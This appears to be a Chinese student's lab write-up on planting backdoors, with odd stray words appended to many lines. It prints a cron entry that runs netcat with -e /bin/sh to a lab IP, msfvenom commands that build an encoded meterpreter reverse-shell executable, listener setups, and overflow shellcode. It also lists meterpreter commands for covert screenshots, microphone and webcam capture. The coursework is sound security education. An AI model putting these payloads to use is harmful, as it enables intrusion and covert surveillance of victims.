# m分鐘 h小時 dom日期 mon月 dow周幾 command執行的命令 12 * * * * /bin/netcat 192.168.235.138 9999 -e /bin/sh
- 用 man socat 命令查看socat的介紹及相關用法: (socat圖)linux
後門就是一個程序。git
咱們接下來學習如何使用msfenom生成後門可執行文件。咱們要生成的這個後門程序是Meterpreter. 揭開Meterpreter的神祕面紗介紹了meterpreter的一些底層原理。web
簡單粗暴 msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212_backdoor.exe 指令生成一個exe後門程序。完整指令是:shell
msfvenom -p windows/meterpreter/reversetcp -x ./fenix.exe -e x86/shikataganai -i 5 -b ‘\x00’ LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212_backdoor.exe
參數說明:windows
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.235.137 //注意此處應爲Linux的IP! set LPORT 5212 //後門程序裏的端口號 show options exploit
說明:瀏覽器
如今去win中雙擊運行20165212_backdoor.exe,點後win7沒反應,而後切回kali,經過msf的監聽進程得到win的主動連接,並獲得遠程控制shell服務器
獲取截屏: screenshot (截屏命令圖(抓的屏圖12))markdown
獲取音頻: record_mic 網絡
獲取攝像頭和錄像: webcam_snap / webcam_stream 。.dom
第一次沒成功,錯誤提示以下 由於win7上沒有裝驅動 ,在虛擬機窗口右下角有個攝像頭圖標,點它就自動安裝驅動了
可是這個很蠢,由於攝像頭上的燈會亮,你偷拍別人會知道..
getuid 獲取運行msf會話的用戶名,從而查看當前會話具備的權限
更多的meterpreter經常使用指令能夠經過輸入 help 獲取
use exploit/multi/handler set payload linux/x86/shell_reverse_tcp set LHOST 192.168.235.137 //注意此處應爲Linux的IP! set LPORT 5212 //後門程序裏的端口號 show options exploit
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.235.137 //注意此處應爲Linux的IP! set LPORT 5212 //後門程序裏的端口號 show options exploit
———————下面是符合要求的、成功的!———————
perl -e 'print "A" x 32;print "\xa0\xd2\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_1
use exploit/multi/handler set payload linux/x86/shell_reverse_tcp set LHOST 127.0.0.1 set LPORT 4444 //這兩個都是根據你的shellcode來的 show options exploit
基礎問題回答
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
——玩遊戲的會後開外掛,那時候我會本身關掉windows Defender和殺軟。遊戲外掛經過驅動劫持(聲卡),在和服務器數據互動的時候實現篡改。或者是瀏覽器漏洞,例如我用edge瀏覽器寫博客,它莫名其妙本身崩潰,還不保存!edge是win10自帶 的一個瀏覽器,兼容性應該沒問題,因此頻繁崩潰的緣由可能在於進程衝突、瀏覽器漏洞……
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?
——我玩遊戲開外掛,那個外掛程序就是一個後門,在我啓動wegame時它會跟着啓動(不隱藏),這應該是手動觸發啓動
(3)Meterpreter有哪些給你映像深入的功能?
——shut down
(4)如何發現本身有系統有沒有被安裝後門?
——日誌,進程查看
實驗內容較多,尤爲是是meterpreter實踐,有不少不少事能夠作,我只寫了看起來重要且經常使用的一些指令,更多的請參考《Metasploit滲透測試魔鬼訓練營》。本次實驗在一個理想化程度很高的環境下完成,這樣在現實中是沒有任何意義的。相比較於msf中花裏胡哨的操做,我以爲更重要的仍是去研究有堆棧保護、有殺軟、有防火牆的環境下如何滲透目標,哪怕是一個bit,由於要在那樣的基礎上咱們後續的實驗、操做纔有可行性。或者是幾我的湊各團隊,每一個人負責一塊。
markdown裏傳圖片功能壞了。。。針對第 5個任務,雖然如今作完了,可是我繼續去用第一種思路調指令,調好了再改。你們有什麼想法或者思路或者發現我哪裏作得有問題 請不要吝嗇啊,評論區互動